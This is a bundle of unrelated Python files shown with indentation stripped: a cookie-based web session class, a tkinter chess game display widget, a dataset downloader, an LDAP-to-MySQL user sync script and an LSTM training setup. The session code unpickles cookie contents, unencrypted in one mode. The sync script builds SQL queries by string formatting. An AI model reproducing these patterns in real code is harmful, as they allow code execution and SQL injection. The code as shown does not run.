def _decrypt_data(self):
"""Bas64, decipher, then un-cerealize the data for the session dict"""
if self.encrypt_key:
nonce = self.cookie[self.key].value[:8]
encrypt_key = generateCryptoKeys(self.encrypt_key, self.validate_key + nonce, 1)
ctrcipher = aes.AES(encrypt_key)
payload = b64decode(self.cookie[self.key].value[8:])
data = ctrcipher.process(payload)
return cPickle.loads(data)
else:
data = b64decode(self.cookie[self.key].value)
return cPickle.loads(data)
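# Cookie payload layout, as implemented above: with encrypt_key set it is an
# 8-character nonce followed by base64(AES-CTR ciphertext of the pickled
# session dict); without encryption it is simply base64(pickled dict).
# _create_cookie() below rejects values longer than 4064 bytes.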
def _make_id(self):
return md5.new(md5.new(
"%f%s%f%d" % (time.time(), id({}), random.random(), os.getpid())
).hexdigest()
).hexdigest()
def save(self):
"saves the data for this session to persistent storage"
self._create_cookie()
def _create_cookie(self):
if '_creation_time' not in self.dict:
self.dict['_creation_time'] = time.time()
if '_id' not in self.dict:
self.dict['_id'] = self._make_id()
self.dict['_accessed_time'] = time.time()
val = self._encrypt_data()
if len(val) > 4064:
raise BeakerException("Cookie value is too long to store")
self.cookie[self.key] = val
if self.cookie_domain:
self.cookie[self.key]['domain'] = self.cookie_domain
if self.secure:
self.cookie[self.key]['secure'] = True
self.cookie[self.key]['path'] = '/'
if self.cookie_expires is not True:
if self.cookie_expires is False:
expires = datetime.fromtimestamp( 0x7FFFFFFF )
elif isinstance(self.cookie_expires, timedelta):
expires = datetime.today() + self.cookie_expires
elif isinstance(self.cookie_expires, datetime):
expires = self.cookie_expires
else:
raise ValueError("Invalid argument for cookie_expires: %s"
% repr(self.cookie_expires))
self.cookie[self.key]['expires'] = \
expires.strftime("%a, %d-%b-%Y %H:%M:%S GMT" )
self.request['cookie_out'] = self.cookie[self.key].output(header='')
self.request['set_cookie'] = True
def delete(self):
# Clear out the cookie contents, best we can do
self.dict = {}
self._create_cookie()
# Alias invalidate to delete
invalidate = delete
class SessionObject(object):
"""Session proxy/lazy creator
This object proxies access to the actual session object, so that in the
case that the session hasn't been used before, it will be setup. This
avoid creating and loading the session from persistent storage unless
its actually used during the request.
"""
def __init__(self, environ, **params):
self.__dict__['_params'] = params
self.__dict__['_environ'] = environ
self.__dict__['_sess'] = None
self.__dict__['_headers'] = []
def _session(self):
"""Lazy initial creation of session object"""
if self.__dict__['_sess'] is None:
params = self.__dict__['_params']
environ = self.__dict__['_environ']
self.__dict__['_headers'] = req = {'cookie_out':None}
req['cookie'] = environ.get('HTTP_COOKIE')
if params.get('type') == 'cookie':
self.__dict__['_sess'] = CookieSession(req, **params)
else:
self.__dict__['_sess'] = Session(req, use_cookies=True, **params)
return self.__dict__['_sess']
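# Typical use (illustrative; the environ key name is an assumption, not taken
# from this file): a WSGI middleware stores
#   environ['beaker.session'] = SessionObject(environ, type='cookie', validate_key=...)
# and the real Session/CookieSession is only constructed on first attribute
# or item access.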
def __getattr__(self, attr):
return getattr(self._session(), attr)
def __setattr__(self, attr, value):
setattr(self._session(), attr, value)
def __delattr__(self, name):
self._session().__delattr__(name)
def __getitem__(self, key):
return self._session()[key]
def __setitem__(self, key, value):
self._session()[key] = value
def __delitem__(self, key):
self._session().__delitem__(key)
def __repr__(self):
return self._session().__repr__()
def __iter__(self):
"""Only works for proxying to a dict"""
return iter(self._session().keys())
def __contains__(self, key):
return self._session().has_key(key)
def get_by_id(self, id):
params = self.__dict__['_params']
session = Session({}, use_cookies=False, id=id, **params)
if session.is_new:
session.namespace.remove()
return None
return session
|
# game.py
# Copyright 2008 Roger Marsh
# Licence: See LICENCE (BSD licence)
"""Widget to display a game of chess.
The display contains the game score, a board with the current position in the
game, and any analysis of the current position by chess engines.
The Game class displays a game of chess.
Instances of Game have an instance of score.Score as an attribute to display
chess engine analysis as well as inheriting much of their function from the
Score class.
An instance of Game fits into the user interface in two ways: as an item in a
panedwindow of the main widget, or as the only item in a new toplevel widget.
"""
# Obsolete comment, but the idea is being realised through the displaypgn and
# displaytext modules. (partial has meanwhile become cql).
# Game (game.py) and Partial (partial.py) should be
# subclasses of some more basic class. They are not because Game started
# as a game displayer while Partial started as a Text widget with no
# validation and they have been converging ever since. Next step will get
# there. Obviously this applies to subclasses GameEdit (gameedit.py)
# and PartialEdit (partialedit.py) as well.
# Score is now a superclass of Game. It is a PGN handling class, not the
# 'more basic class' above.
import tkinter
from pgn_read.core.constants import (
TAG_FEN,
)
from pgn_read.core.parser import PGN
from pgn_read.core.game import generate_fen_for_position
from ..core.pgn import (
GameDisplayMoves,
GameAnalysis,
)
from .board import Board
from .score import Score, AnalysisScore, ScoreNoGameException
from .constants import (
ANALYSIS_INDENT_TAG,
ANALYSIS_PGN_TAGS_TAG,
MOVETEXT_INDENT_TAG,
FORCED_INDENT_TAG,
MOVETEXT_MOVENUMBER_TAG,
STATUS_SEVEN_TAG_ROSTER_PLAYERS,
)
from .eventspec import EventSpec
from ..core.analysis import Analysis
from ..core.constants import (
UNKNOWN_RESULT,
END_TAG,
START_TAG,
)
class Game(Score):
"""Chess game widget composed from Board and Text widgets.
master is used as the master argument for the tkinter Frame widget passed
to superclass and the Board call.
ui is used as the ui argument in the Board call, and bound to the ui
attribute of self.
The Board widget is used as the board argument in the super().__init__
and AnalysisScore calls.
tags_variations_comments_font is used as the tags_variations_comments_font
argument in the super().__init__ and AnalysisScore calls.
moves_played_in_game_font is used as the moves_played_in_game_font
argument in the super().__init__ and AnalysisScore calls.
items_manager is used as the items_manager argument in the
super().__init__ and AnalysisScore calls.
itemgrid is used as the itemgrid argument in the super().__init__ and
AnalysisScore calls.
boardfont is used as the boardfont argument in the Board call.
gameclass is used as the gameclass argument in the super().__init__ call.
Analysis of the game's current position, where available, is provided by
an AnalysisDS instance from the dpt.analysisds or basecore.analysisds
modules.
"""
# Some menu popup entries in the Game hierarchy declare their location
# as 'before Analyse' or 'before Export'. This is a convenient way of
# getting the popup entries in the desired order, taking order of
# execution of various methods into account: nothing special about the
# analyse or export entries otherwise.
analyse_popup_label = EventSpec.analyse_game[1]
export_popup_label = EventSpec.menu_database_export[1]
def __init__(
self,
master=None,
tags_variations_comments_font=None,
moves_played_in_game_font=None,
boardfont=None,
gameclass=GameDisplayMoves,
ui=None,
items_manager=None,
itemgrid=None,
**ka
):
"""Create Frame and Board, then delegate, then set grid geometry."""
self.ui = ui
panel = tkinter.Frame(master, borderwidth=2, relief=tkinter.RIDGE)
panel.bind("<Configure>", self.try_event(self._on_configure))
panel.grid_propagate(False)
board = Board(panel, boardfont=boardfont, ui=ui)
super().__init__(
panel,
board,
tags_variations_comments_font=tags_variations_comments_font,
moves_played_in_game_font=moves_played_in_game_font,
gameclass=gameclass,
items_manager=items_manager,
itemgrid=itemgrid,
**ka
)
self.scrollbar.grid(column=2, row=0, rowspan=1, sticky=tkinter.NSEW)
self.analysis = AnalysisScore(
panel,
board,
owned_by_game=self,
tags_variations_comments_font=tags_variations_comments_font,
moves_played_in_game_font=moves_played_in_game_font,
gameclass=GameAnalysis,
items_manager=items_manager,
itemgrid=itemgrid,
**ka
)
self.score.tag_configure(FORCED_INDENT_TAG, lmargin1=20)
self.score.tag_configure(MOVETEXT_INDENT_TAG, lmargin2=20)
self.score.tag_configure(MOVETEXT_MOVENUMBER_TAG, elide=tkinter.FALSE)
self.analysis.score.configure(wrap=tkinter.WORD)
self.analysis.score.tag_configure(ANALYSIS_INDENT_TAG, lmargin2=80)
self.analysis.score.tag_configure(
ANALYSIS_PGN_TAGS_TAG, elide=tkinter.TRUE
)
self.analysis.scrollbar.grid(
column=2, row=1, rowspan=1, sticky=tkinter.NSEW
)
self.board.get_top_widget().grid(
column=0, row=0, rowspan=1, sticky=tkinter.NSEW
)
self.score.grid(column=1, row=0, rowspan=1, sticky=tkinter.NSEW)
self.analysis.score.grid(
column=0, row=1, columnspan=2, sticky=tkinter.NSEW
)
if not ui.show_analysis:
panel.after_idle(self.hide_game_analysis)
if not ui.visible_scrollbars:
panel.after_idle(self.hide_scrollbars)
self.configure_game_widget()
# True means analysis widget refers to same position as game widget; so
# highlighting of analysis still represents future valid navigation.
# Any navigation in game widget makes any highlighting in analysis
# widget out of date.
self.game_position_analysis = False
self.game_analysis_in_progress = False
self.takefocus_widget = self.score
self.analysis_data_source = None
def get_top_widget(self):
"""Return topmost widget for game display."""
return self.panel
def destroy_widget(self):
"""Destroy the widget displaying game."""
# Avoid "OSError: [WinError 535] Pipe connected" at Python3.3 running
# under Wine on FreeBSD 10.1 by disabling the UCI functions.
# Assume all later Pythons are affected because they do not install
# under Wine at time of writing.
# The OSError stopped happening by wine-2.0_3,1 on FreeBSD 10.1 but
# get_nowait() fails to 'not wait', so ChessTab never gets going under
# wine at present. Leave alone because it looks like the problem is
# being shifted constructively.
# At Python3.5 running under Wine on FreeBSD 10.1, get() does not wait
# when the queue is empty either, and ChessTab does not run under
# Python3.3 because it uses asyncio: so no point in disabling.
# try:
# self.ui.uci.uci.ui_analysis_queue.put(
# (self.analysis.score, self.analysis.score))
# except AttributeError:
# if self.ui.uci.uci.uci_drivers_reply is not None:
# raise
self.ui.uci.uci.ui_analysis_queue.put(
(self.analysis.score, self.analysis.score)
)
self.panel.destroy()
def _on_configure(self, event=None):
"""Catch initial configure and rebind to on_configure."""
# Not sure, at time of writing this, how partial.py is
# different but that module does not need this trick to display
# the control with the right size on creation.
# Here the extra first event has width=1 height=1, followed by an event
# with the required dimensions.
self.panel.bind("<Configure>", self.try_event(self.on_configure))
def on_configure(self, event=None):
"""Reconfigure board and score after container has been resized."""
self.configure_game_widget()
self.see_current_move()
def _analyse_position(self, *position):
analysis = self.get_analysis(*position)
self.refresh_analysis_widget_from_database(analysis)
if self.game_analysis_in_progress:
if not self.ui.uci.uci.is_positions_pending_empty():
return
self.game_analysis_in_progress = False
analysis.variations.clear()
# Avoid "OSError: [WinError 535] Pipe connected" at Python3.3 running
# under Wine on FreeBSD 10.1 by disabling the UCI functions.
# Assume all later Pythons are affected because they do not install
# under Wine at time of writing.
# The OSError stopped happening by wine-2.0_3,1 on FreeBSD 10.1 but
# get_nowait() fails to 'not wait', so ChessTab never gets going under
# wine at present. Leave alone because it looks like the problem is
# being shifted constructively.
# At Python3.5 running under Wine on FreeBSD 10.1, get() does not wait
# when the queue is empty either, and ChessTab does not run under
# Python3.3 because it uses asyncio: so no point in disabling.
# try:
# self.ui.uci.uci.ui_analysis_queue.put((self.analysis.score, pa))
# except AttributeError:
# if self.ui.uci.uci.uci_drivers_reply is not None:
# raise
self.ui.uci.uci.ui_analysis_queue.put((self.analysis.score, analysis))
def set_game_board(self):
"""Set board to show position after highlighted move."""
# Assume setting new position implies analysis is out of date.
# Caller should reset to True if sure analysis still refers to game
# position. (Probably just F7 or F8 to the game widget.)
self.game_position_analysis = False
if not super().set_game_board():
return
if self.current is None:
position = self.fen_tag_tuple_square_piece_map()
else:
position = self.tagpositionmap[self.current]
self._analyse_position(*position)
def set_and_tag_item_text(self, reset_undo=False):
"""Delegate then queue analysis request to chess engines."""
try:
super().set_and_tag_item_text(reset_undo=reset_undo)
except ScoreNoGameException:
return
self.score.tag_add(MOVETEXT_INDENT_TAG, "1.0", tkinter.END)
self._analyse_position(*self.fen_tag_tuple_square_piece_map())
def analyse_game(self):
"""Analyse all positions in game using all active engines."""
uci = self.ui.uci.uci
sas = self.analysis.score
sga = self.get_analysis
self.game_analysis_in_progress = True
for value in self.tagpositionmap.values():
analysis = sga(*value)
analysis.variations.clear()
# Avoid "OSError: [WinError 535] Pipe connected" at Python3.3
# running under Wine on FreeBSD 10.1 by disabling the UCI functions.
# Assume all later Pythons are affected because they do not install
# under Wine at time of writing.
# The OSError stopped happening by wine-2.0_3,1 on FreeBSD 10.1 but
# get_nowait() fails to 'not wait', so ChessTab never gets going
# under wine at present. Leave alone because it looks like the
# problem is being shifted constructively.
# At Python3.5 running under Wine on FreeBSD 10.1, get() does not
# wait when the queue is empty either, and ChessTab does not run
# under Python3.3 because it uses asyncio: so no point in disabling.
# try:
# uci.ui_analysis_queue.put((sas, pa))
# except AttributeError:
# if uci.uci_drivers_reply is not None:
# raise
# break
uci.ui_analysis_queue.put((sas, analysis))
def hide_game_analysis(self):
"""Hide the widgets which show analysis from chess engines."""
self.analysis.score.grid_remove()
self.analysis.scrollbar.grid_remove()
self.score.grid_configure(rowspan=2)
if self.score.grid_info()["columnspan"] == 1:
self.scrollbar.grid_configure(rowspan=2)
self.configure_game_widget()
self.see_current_move()
def show_game_analysis(self):
"""Show the widgets which show analysis from chess engines."""
self.score.grid_configure(rowspan=1)
if self.score.grid_info()["columnspan"] == 1:
self.scrollbar.grid_configure(rowspan=1)
self.analysis.score.grid_configure(columnspan=2)
self.analysis.scrollbar.grid_configure()
else:
self.analysis.score.grid_configure(columnspan=3)
self.configure_game_widget()
self.see_current_move()
def hide_scrollbars(self):
"""Hide the scrollbars in the game display widgets."""
self.scrollbar.grid_remove()
self.analysis.scrollbar.grid_remove()
self.score.grid_configure(columnspan=2)
if self.score.grid_info()["rowspan"] == 1:
self.analysis.score.grid_configure(columnspan=3)
self.configure_game_widget()
self.see_current_move()
def show_scrollbars(self):
"""Show the scrollbars in the game display widgets."""
self.score.grid_configure(columnspan=1)
if self.score.grid_info()["rowspan"] == 1:
self.scrollbar.grid_configure(rowspan=1)
self.analysis.score.grid_configure(columnspan=2)
self.analysis.scrollbar.grid_configure()
else:
self.scrollbar.grid_configure(rowspan=2)
self.configure_game_widget()
self.see_current_move()
def toggle_analysis_fen(self):
"""Toggle display of FEN in analysis widgets."""
widget = self.analysis.score
if int(widget.tag_cget(ANALYSIS_PGN_TAGS_TAG, "elide")):
widget.tag_configure(ANALYSIS_PGN_TAGS_TAG, elide=tkinter.FALSE)
else:
widget.tag_configure(ANALYSIS_PGN_TAGS_TAG, elide=tkinter.TRUE)
self.see_current_move()
def toggle_game_move_numbers(self):
"""Toggle display of move numbers in game score widgets."""
widget = self.score
if int(widget.tag_cget(MOVETEXT_MOVENUMBER_TAG, "elide")):
widget.tag_configure(MOVETEXT_MOVENUMBER_TAG, elide=tkinter.FALSE)
else:
widget.tag_configure(MOVETEXT_MOVENUMBER_TAG, elide=tkinter.TRUE)
self.see_current_move()
def refresh_analysis_widget_from_engine(self, analysis):
"""Refresh game widget with updated chess engine analysis."""
uci = self.ui.uci.uci
move_played = self.get_move_for_start_of_analysis()
if analysis.position in uci.position_analysis:
new_text = uci.position_analysis[
analysis.position
].translate_analysis_to_pgn(move_played=move_played)
else:
new_text = []
new_text.append(UNKNOWN_RESULT)
if move_played:
new_text.insert(0, move_played)
new_text.insert(
0,
"".join(
(
START_TAG,
TAG_FEN,
'"',
analysis.position,
END_TAG.join('"\n'),
)
),
)
new_text = "".join(new_text)
if new_text == self.analysis.analysis_text:
return
# Assume TypeError exception happens because analysis is being shown
# for a position which is checkmate or stalemate.
try:
self.analysis.collected_game = next(
PGN(game_class=self.analysis.gameclass).read_games(new_text)
)
except TypeError:
pass
# Assume analysis movetext problems occur only if editing moves.
# if not pgn.is_movetext_valid():
if not self.analysis.collected_game.is_movetext_valid():
return
self.analysis.clear_score()
self.analysis.set_score(new_text)
try:
fmog = self.analysis.select_first_move_of_game()
except tkinter.TclError:
fmog = False
if fmog:
widget = self.analysis.score
widget.tag_add(
ANALYSIS_INDENT_TAG, widget.tag_ranges(fmog)[0], tkinter.END
)
widget.tag_add(
ANALYSIS_PGN_TAGS_TAG, "1.0", widget.tag_ranges(fmog)[0]
)
def refresh_analysis_widget_from_database(self, analysis):
"""Refresh game widget with updated chess engine analysis."""
        # When a database is open the analysis is refreshed from the database
        # while checking whether that analysis is up to date with respect to
        # the depth and multiPV parameters held in the self.ui.uci.uci UCI
        # object.
if self.ui.database is None:
self.refresh_analysis_widget_from_engine(analysis)
return
# Assume TypeError exception happens because analysis is being shown
# for a position which is checkmate or stalemate.
try:
new_text = analysis.translate_analysis_to_pgn(
self.get_move_for_start_of_analysis()
)
except TypeError:
return
if new_text == self.analysis.analysis_text:
return
# Assume TypeError exception happens because analysis is being shown
# for a position which is checkmate or stalemate.
try:
self.analysis.collected_game = next(
PGN(game_class=self.analysis.gameclass).read_games(new_text)
)
except TypeError:
pass
self.analysis.clear_score()
self.analysis.set_score(new_text)
try:
fmog = self.analysis.select_first_move_of_game()
except tkinter.TclError:
fmog = False
if fmog:
widget = self.analysis.score
widget.tag_add(
ANALYSIS_INDENT_TAG, widget.tag_ranges(fmog)[0], tkinter.END
)
widget.tag_add(
ANALYSIS_PGN_TAGS_TAG, "1.0", widget.tag_ranges(fmog)[0]
)
def refresh_analysis_widget(self, analysis):
"""Refresh game widget with new chess engine analysis."""
        # This method is called at regular intervals to cope with fresh
        # analysis of displayed positions caused by changes in engine
        # parameters (depth and multiPV).  A set of new analysis since the
        # last call is needed.
self.refresh_analysis_widget_from_database(analysis)
def configure_game_widget(self):
"""Configure board and score widgets for a game display."""
width = self.panel.winfo_width()
height = self.panel.winfo_height()
borderwidth = self.panel.cget("borderwidth")
if self.ui.show_analysis:
row_minsize = (height - borderwidth * 2) // 2
column_minsize = width - row_minsize
else:
row_minsize = height - borderwidth * 2
column_minsize = width - borderwidth * 2
measure = (row_minsize + column_minsize) // 3
if measure * 3 > column_minsize * 2:
measure = (column_minsize * 2) // 3
elif measure > row_minsize:
measure = row_minsize
row_minsize = row_minsize - measure
column_minsize = column_minsize - measure
self.panel.grid_rowconfigure(1, minsize=row_minsize)
self.panel.grid_columnconfigure(1, minsize=column_minsize)
self.panel.grid_rowconfigure(0, weight=1)
self.panel.grid_rowconfigure(1, weight=1)
self.panel.grid_columnconfigure(0, weight=1)
self.panel.grid_columnconfigure(1, weight=1)
self.panel.grid_columnconfigure(2, weight=0)
def set_primary_activity_bindings(self, switch=True):
"""Delegate then set board pointer move navigation bindings."""
super().set_primary_activity_bindings(switch=switch)
if self.score is self.takefocus_widget:
self.set_board_pointer_move_bindings(switch=switch)
else:
self.analysis.set_board_pointer_move_bindings(switch=switch)
def set_select_variation_bindings(self, switch=True):
"""Delegate then set board pointer select variation bindings."""
super().set_select_variation_bindings(switch=switch)
if self.score is self.takefocus_widget:
self.set_board_pointer_select_variation_bindings(switch=switch)
else:
self.analysis.set_board_pointer_select_variation_bindings(
switch=switch
)
# It is not wrong to activate, or deactivate, all three sets of bindings
# for both self(.score) and self.analysis(.score) but the current choice
# is to leave Database and Close Item bindings out of self.analysis.
# Database and Close Item refer to the item, game or repertoire, not the
# engine analysis.
def set_database_navigation_close_item_bindings(self, switch=True):
"""Enable or disable bindings for navigation and database selection."""
self.set_event_bindings_score(
self.get_database_events(), switch=switch
)
self.set_event_bindings_score(
self.get_navigation_events(), switch=switch
)
self.set_event_bindings_score(
self.get_close_item_events(), switch=switch
)
self.analysis.set_event_bindings_score(
self.get_navigation_events(), switch=switch
)
def set_board_pointer_widget_navigation_bindings(self, switch):
"""Enable or disable bindings for widget selection."""
self.set_event_bindings_board(
self.get_modifier_buttonpress_suppression_events(), switch=switch
)
self.set_event_bindings_board(
(
(EventSpec.buttonpress_1, self.give_focus_to_widget),
(EventSpec.buttonpress_3, self.post_inactive_menu),
),
switch=switch,
)
def set_score_pointer_widget_navigation_bindings(self, switch):
"""Set or unset pointer bindings for widget navigation."""
self.set_event_bindings_board(
self.get_modifier_buttonpress_suppression_events(), switch=switch
)
if not switch:
bindings = (
(EventSpec.buttonpress_1, self.press_break),
(EventSpec.buttonpress_3, self.press_break),
)
self.set_event_bindings_score(bindings)
self.analysis.set_event_bindings_score(bindings)
else:
bindings = ((EventSpec.buttonpress_1, self.give_focus_to_widget),)
self.set_event_bindings_score(bindings)
self.analysis.set_event_bindings_score(bindings)
self.set_event_bindings_score(
((EventSpec.buttonpress_3, self.post_inactive_menu),)
)
self.analysis.set_event_bindings_score(
((EventSpec.buttonpress_3, self.analysis.post_inactive_menu),)
)
def set_toggle_game_analysis_bindings(self, switch):
"""Set keystoke bindings to switch between game and analysis."""
self.set_event_bindings_score(
((EventSpec.scoresheet_to_analysis, self.analysis_current_item),)
)
self.analysis.set_event_bindings_score(
((EventSpec.analysis_to_scoresheet, self.current_item),)
)
def set_score_pointer_to_score_bindings(self, switch):
"""Set score pointer bindings to go to game."""
self.set_event_bindings_score(
((EventSpec.alt_buttonpress_1, self.current_item),), switch=switch
)
def set_analysis_score_pointer_to_analysis_score_bindings(self, switch):
"""Set analysis score pointer bindings to go to analysis score."""
self.analysis.set_event_bindings_score(
((EventSpec.alt_buttonpress_1, self.analysis_current_item),),
switch=switch,
)
def set_colours(self, sbg, bbg, bfg):
"""Set colours and fonts used to display games.
sbg == True - set game score colours
bbg == True - set board square colours
bfg == True - set board piece colours
"""
if sbg:
for widget in self, self.analysis:
widget.score.tag_configure(
"l_color", background=widget.l_color
)
widget.score.tag_configure(
"m_color", background=widget.m_color
)
widget.score.tag_configure(
"am_color", background=widget.am_color
)
widget.score.tag_configure(
"v_color", background=widget.v_color
)
if bbg:
self.board.set_color_scheme()
if bfg:
self.board.draw_board()
def set_position_analysis_data_source(self):
"""Attach database analysis for position to game widget."""
if self.ui is None:
self.analysis_data_source = None
return
self.analysis_data_source = (
self.ui.make_position_analysis_data_source()
)
def get_analysis(self, *a):
"""Return database analysis for position or empty position Analysis.
get_analysis is not interested in the arguments, which are passed on
to self.generate_fen_for_position().
"""
if self.analysis_data_source:
return self.analysis_data_source.get_position_analysis(
self.generate_fen_for_position(*a)
)
return Analysis(position=self.generate_fen_for_position(*a))
@staticmethod
def generate_fen_for_position(squares, *a):
"""Return FEN for current position.
Ensure the Piece instances in the squares dictionary reference their
squares key value in the Piece.square attribute before calling the
generate_fen_for_position() function imported from pgn_read.core.game.
These can be different while choosing which of the pieces of a type,
usually two, can make the move specified in the PGN.
"""
for square, piece in squares.items():
piece.set_square(square)
return generate_fen_for_position(squares.values(), *a)
def create_primary_activity_popup(self):
"""Delegate then add navigation submenu and return popup menu."""
popup = super().create_primary_activity_popup()
self.set_popup_bindings(
popup,
((EventSpec.analyse_game, self.analyse_game),),
index=self.export_popup_label,
)
self.create_widget_navigation_submenu_for_popup(popup)
return popup
def create_select_move_popup(self):
"""Delegate then add navigation submenu and return popup menu."""
popup = super().create_select_move_popup()
self.create_widget_navigation_submenu_for_popup(popup)
return popup
def set_statusbar_text(self):
"""Set status bar to display player name PGN Tags."""
tags = self.collected_game._tags
self.ui.statusbar.set_status_text(
" ".join(
[tags.get(k, "") for k in STATUS_SEVEN_TAG_ROSTER_PLAYERS]
)
)
|
import argparse
from torchvision.datasets import MNIST, FashionMNIST, CIFAR10
import yaml
def main(args):
MNIST(args.data_path, download=True)
FashionMNIST(args.data_path, download=True)
CIFAR10(args.data_path, download=True)
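    # Update the dataset root in config/base.yml to the download location,
    # presumably so later training stages read their data from args.data_path.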
with open('config/base.yml', 'r') as fin:
cfg = yaml.load(fin.read(), yaml.SafeLoader)
cfg['root'] = args.data_path
    with open('config/base.yml', 'w') as fout:
        yaml.dump(cfg, fout, default_flow_style=False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Dataset Download")
parser.add_argument("--data_path", type=str, required=True)
args = parser.parse_args()
main(args)
|
#!/usr/bin/env python
# The MIT License (MIT)
#
# Copyright (c) 2015 Mike Johnson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# TODO: Add some argparse stuff later
#import argparse
import ldap
import mysql.connector
import sys
################################################################
# !! BEGIN: user configuration
################################################################
# Exclusion List: local accounts, do not check for updates
# -------------------------------------------------------------
exclusion = ['admin', 'administrator']
# LDAP Credentials
# --------------------------------------------------------------
ldapserver = "ldap://<server>:<port>"
binddn = "CN=<bind user>,CN=Users,dc=<domain>,dc=<tld>"
bindpw = "<bind user pass>"
basedn = "CN=Users,DC=<domain>,DC=<tld>"
# MySQL Credentials
# --------------------------------------------------------------
mysqlsvr = "localhost"
mysql_db = "<rundeck mysql database>"
mysqlusr = "<rundeck mysql username>"
mysqlpwd = "<rundeck mysql password>"
################################################################
# !! END: user configuration
################################################################
def ldap_search(username):
# LDAP Search
searchFilter = "(&(objectclass=User)(sAMAccountName=%s))" % username
searchAttribute = ["givenName","sn","mail"]
l = ldap.initialize(ldapserver) # Initialize LDAP
searchScope = ldap.SCOPE_SUBTREE # this will scope the entire subtree under UserUnits
# Bind to the server
try:
l.protocol_version = ldap.VERSION3
l.simple_bind_s(binddn, bindpw)
except ldap.INVALID_CREDENTIALS:
sys.exit(0)
    except ldap.LDAPError:
        sys.exit(0)
try:
ldap_result_id = l.search(basedn, searchScope, searchFilter, searchAttribute)
result_set = []
result_type, result_data = l.result(ldap_result_id, 0)
if (result_data == []):
# aww, no data found
data = None
else:
# yay, we found some data
if result_type == ldap.RES_SEARCH_ENTRY:
result_set.append(result_data)
cn = result_data[0][0] # cn Returned first
data = result_data[0][1] # searchAttributes second
# Clean up the data items for easy access
for (i, j) in data.items():
if len(j) == 1:
data[i] = j[0]
return data
    except ldap.LDAPError:
sys.exit(0)
finally:
l.unbind_s()
return 0
def mysql_update(cursor, username, userdata):
query = "UPDATE rduser SET first_name='{}', last_name='{}', email='{}' WHERE login='{}'".format(
userdata["givenName"], userdata["sn"], userdata["mail"], username)
cursor.execute(query)
def mysql_search():
cnx = mysql.connector.connect(host=mysqlsvr, user=mysqlusr, password=mysqlpwd, database=mysql_db)
cur = cnx.cursor()
query = "SELECT login from rduser where email is NULL and login <> 'admin'"
for login in exclusion:
query += " and login <> '{}'".format(login)
    print(query)
    cur.execute(query)
    result = cur.fetchall()
    print(result)
for login in result:
userdata = ldap_search(login[0])
mysql_update(cur, login[0], userdata)
cur.close()
cnx.commit()
cnx.close()
def main():
# TODO: Add some argparse
# --full-update ?
mysql_search()
if __name__ == "__main__":
main()
|
import argparse
import os
import pickle
import tensorflow as tf
from pathlib import Path
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
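# str2bool is used below as the argparse `type=` converter for the --continue
# flag, so it accepts yes/no, true/false, t/f, y/n and 1/0.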
def split_input_target(chunk):
input_text = chunk[:-1]
target_text = chunk[1:]
return input_text, target_text
def load_configs(directory):
    path = os.path.join(directory, "parameters.bin")
    with open(path, 'rb') as f:
        return pickle.loads(f.read())
def save_model_configs(directory, params):
    Path(directory).mkdir(parents=True, exist_ok=True)
    path = os.path.join(directory, "parameters.bin")
    with open(path, 'wb') as f:
        f.write(pickle.dumps(params))
def build_model(vocab_size, embedding_dim, rnn_units, batch_size, layers_amount):
layers = [tf.keras.layers.Embedding(vocab_size, embedding_dim, batch_input_shape=[batch_size, None])] # First layer
for n in range(layers_amount):
layers.append(tf.keras.layers.LSTM(rnn_units, return_sequences=True, stateful=True, recurrent_initializer='glorot_uniform')) # Creating the rest of the layers
layers.append(tf.keras.layers.Dense(vocab_size)) # Creating last layer
model = tf.keras.Sequential(layers) # Converting the layers into a model
return model
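# Example usage (the vocabulary size is hypothetical; the other values match the
# CLI defaults defined in setup_args below):
#   model = build_model(vocab_size=65, embedding_dim=128, rnn_units=512,
#                       batch_size=64, layers_amount=3)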
def setup_args():
    parser = argparse.ArgumentParser(description='List of available commands.')
# The path where the file is
parser.add_argument('--data', dest="data", type=str, nargs='?', help='Path to the file to train on')
# Where it's going to save the checkpoints
parser.add_argument('--save', dest="save", type=str, nargs='?',
help='Path to where the checkpoints should be saved')
# Epochs amount
parser.add_argument('--epochs', dest="epochs", metavar="100", type=int, nargs='?', help='Number of epochs',
default=100)
# Batch size
parser.add_argument('--batch', dest="batch", metavar="64", type=int, nargs='?', help='Batch size', default=64)
# LSTM unit's number
parser.add_argument('--units', dest="units", metavar="512", type=int, nargs='?', help='Number of LSTM Units',
default=512)
# LSTM unit's layers
parser.add_argument('--layers', dest="layers", metavar="3", type=int, nargs='?', help='Number of LSTM Layers',
default=3)
# The maximum length of chars
parser.add_argument('--length', dest="length", metavar="100", type=int, nargs='?',
help='The maximum length sentence for a single input in characters', default=100)
# Embedding size
parser.add_argument('--embedding', dest="embedding", metavar="128", type=int, nargs='?',
help='The embedding dimension size', default=128)
# Continue from last checkpoint
parser.add_argument("--continue", dest="cont", metavar="False", type=str2bool, nargs='?', const=True,
default=False, help="Continue from last save.")
    # Buffer for shuffling so it won't shuffle all of the text at once
parser.add_argument("--buffer", dest="buffer", metavar="10000", type=int, nargs='?',
default=10000, help="Buffer size to shuffle the dataset")
    # How many batches to process between progress notifications
parser.add_argument("--notify", dest="notify", metavar="100", type=int, nargs='?',
default=100, help="Notify process once every X batches")
    # How many epochs to wait between checkpoint saves
    parser.add_argument("--saving_after", dest="saving_after", metavar="1", type=int, nargs='?',
                        default=1, help="How many epochs to wait between checkpoint saves")
return parser.parse_args()
|
